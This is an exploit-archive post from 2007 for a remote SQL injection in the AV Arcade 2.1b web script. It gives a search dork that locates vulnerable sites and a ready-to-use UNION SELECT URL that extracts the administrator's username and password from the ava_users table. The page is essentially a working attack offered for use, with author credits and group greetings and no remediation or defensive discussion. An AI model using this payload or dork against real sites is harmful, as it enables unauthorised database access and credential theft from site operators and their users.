AV Arcade 2.1b (index.php id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AV Arcade 2.1b (index.php id) Remote SQL Injection Vulnerability
# Published : 2007-07-02
# Author : Kw3[R]Ln
# Previous Title : YouTube Clone Script (msg.php id) Remote SQL Injection Vulnerability
# Next Title : PHPDirector <= 0.21 (videos.php id) Remote SQL Injection Vulnerability

Web: AV Arcade 2.1b
Site : www.avscripts.net
Dork : "Powered By AV Arcade"

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]
Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET


Description: SQL injection in $id of includes/view_page.php

Exploit:
/index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20ava_users%20WHERE%20id=1

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ]

# www.Syue.com [2007-07-02]